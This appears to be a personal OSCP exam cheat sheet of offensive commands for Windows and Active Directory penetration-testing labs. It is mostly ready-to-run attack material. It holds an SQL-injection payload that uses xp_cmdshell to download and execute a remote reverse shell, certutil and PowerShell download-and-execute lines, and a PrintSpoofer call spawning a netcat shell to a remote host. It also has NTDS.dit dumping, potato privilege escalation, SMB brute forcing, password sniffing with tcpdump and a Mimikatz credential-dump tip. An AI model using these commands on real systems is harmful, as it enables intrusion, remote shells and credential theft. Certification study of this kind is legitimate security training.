Oscp
Admin+'%3b+EXEC+xp_cmdshell+"powershell.exe+-c+IEX(New-Object+Net.WebClient).DownloadString('http%3a//192.168.45.177/reverse.ps1')+"%3b--
TODO
File Transfer
CMD&Powershell
certutil.exe -urlcache -split -f http://192.168.45.219/Database.kdbx Database.kdbx
Powershell
IEX (New-Object Net.Webclient).downloadString('http://10.10.10.10/Invoke-PowershellTcp.ps1')
iwr -uri http://192.168.45.229/met.exe -Outfile met.exe
msfvenom exec
smbclient pth
xfreerdp pth
pth-winexe (try this one after impacket; just type `pth` and discover the tools we have)
Enable stuff :
rdp : Enable-PSRemoting
winrm: winrm quickconfig
CrackMapExec
Dump the NTDS.dit from target DC
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
Potatoes Syntax
JuicyPotatoNG
.\JuicyPotatoNG.exe -t * -p "C:\windows\system32\cmd.exe" -a "/c whoami"
GodPotato
.\GodPotato-NET4.exe -cmd "cmd /c whoami"
PrintSpoofer
.\PrintSpoofer.exe -c "C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd"
ldap :
snmp :
Regular scan :
This shit... took me a while to find. It will give you hidden details, if there are any:
snmpwalk -v2c -c public 192.168.206.156 NET-SNMP-EXTEND-MIB::nsExtendObjects
It works with -v1 as well.
bloodhound:
Remotely: /opt/BloodHound.py/bloodhound.py -d heist.offsec -u enox -p california -c all -ns 192.168.152.165 (no zip is created, just upload the json files)
Locally : ./SharpHound.exe --CollectionMethod All,GPOLocalGroup,LoggedOn
Services :
Getting all Running services
Get-Service | Where-Object -Property Status -EQ Running
OR
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}
Quick Tips :
-(Alternative to tree command) find . | sed -e "s/[^-][^\/]*\// |/g" -e "s/|\([^ ]\)/|-\1/"
-Getting the current system architecture: dpkg --print-architecture
-If you pwned a WordPress site and uploaded your shell into 404.php, here's the curl: curl http://$ip/wp-content/themes/twentyseventeen/404.php
-If you see tcpdump is installed, check the result of a live tcpdump capture. It might include a password: sudo tcpdump -i lo -A | grep "pass"
-(bruteforcing smb via hydra) hydra -l [user] -P [wordlist] smb://[target]/[user] (UNTESTED)
-Use /home/kali/THM/PrivESc/Windows/creddump7/pwdump.py against SAM and SYSTEM in case secretsdump doesn't work.
Important Notes :
- If you have LFI, you can execute PHP files via directory traversal.
- THIS ONE CAN SAVE YOUR 1-TIME MSF RIGHT: IF YOU'RE RUNNING MIMIKATZ WITH ADMIN BUT IT STILL ERRORS OUT (example: kuhl), USE `lsadump::lsa /inject` after privilege::debug and token::elevate. IT WORKS LIKE MAGIC.